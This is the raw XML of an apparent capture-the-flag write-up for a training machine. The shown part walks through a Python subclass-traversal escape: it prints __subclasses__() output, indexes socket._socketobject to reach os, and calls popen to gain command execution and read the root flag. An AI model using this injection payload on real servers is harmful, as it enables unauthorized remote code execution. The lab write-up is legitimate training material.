    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'sys.float_info'&gt;, &lt;type 'EncodingMap'&gt;, &lt;type 'fieldnameiterator'&gt;, &lt;type 'formatteriterator'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'sys.version_info'&gt;, &lt;type 'sys.flags'&gt;, &lt;type 'exceptions.BaseException'&gt;, &lt;type 'module'&gt;, &lt;type 'imp.NullImporter'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'zipimport.zipimporter'&gt;, &lt;type 'posix.stat_result'&gt;, &lt;type 'posix.statvfs_result'&gt;, &lt;class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'warnings.WarningMessage'&gt;, &lt;class 'warnings.catch_warnings'&gt;, &lt;class '_weakrefset._IterationGuard'&gt;, &lt;class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'_weakrefset.WeakSet'&gt;, &lt;class '_abcoll.Hashable'&gt;, &lt;type 'classmethod'&gt;, &lt;class '_abcoll.Iterable'&gt;, &lt;class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'_abcoll.Sized'&gt;, &lt;class '_abcoll.Container'&gt;, &lt;class '_abcoll.Callable'&gt;, &lt;type 'dict_keys'&gt;, &lt;type 'dict_items'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'dict_values'&gt;, &lt;class 'site._Printer'&gt;, &lt;class 'site._Helper'&gt;, &lt;type '_sre.SRE_Pattern'&gt;, &lt;type '_sre.SRE_Match'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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&lt;type '_sre.SRE_Scanner'&gt;, &lt;class 'site.Quitter'&gt;, &lt;class 'codecs.IncrementalEncoder'&gt;, &lt;class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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'codecs.IncrementalDecoder'&gt;, &lt;type 'functools.partial'&gt;, &lt;type '_ssl._SSLContext'&gt;, &lt;type '_ssl._SSLSocket'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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'cStringIO.StringO'&gt;, &lt;type 'cStringIO.StringI'&gt;, &lt;class 'socket._closedsocket'&gt;, &lt;type '_socket.socket'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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'method_descriptor'&gt;, &lt;class 'socket._socketobject'&gt;, &lt;class 'socket._fileobject'&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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will access the globals of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket._socketobject</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it imports the Python</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["os"]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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pasting all subclasses into Visual Studio Code, I can find the position of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket._socketobject</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5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279900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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59436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Its position is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">88</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but since it is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">array </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and starts at position 0, we subtract 1 — which gives position </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">87</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5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Confirming that it indeed imports the Python </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">["os"]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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private.__class__.mro()[2].__subclasses__()[87].__init__.__globals__</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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416300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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From here we already have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the server — now we just need to call the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen</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function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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62100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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5943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Finally, we just need to read the last flag located in the root user’s directory =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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5943600" cy="1536700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41"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60">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="8"/>
    <w:bookmarkEnd w:id="8"/>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-866769</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="74" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image16.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61">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62">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2.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-942969</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="55" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.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Editor</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image27.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image27.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6696075" cy="3009472"/>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footer" Target="footer2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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26.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/37" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rdocumentation.org/packages/base/versions/3.6.2/topics/system" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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6.jp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7.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F5LqRhs0h9sGAPx5MmUdYUP2LQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg1oLmpmZ2tvYm8zaHpjMg5oLmJhdDNoczV1bGNsbTIOaC5yNmRhNDVvcTUwNXUyDmguamppODUwcGo5enE1Mg5oLjE3NWY1Y3M5NHowbzgAciExNWdsRDJkV2tIVlFJX085bkp6c3Qwa192TDB5SXB3blc=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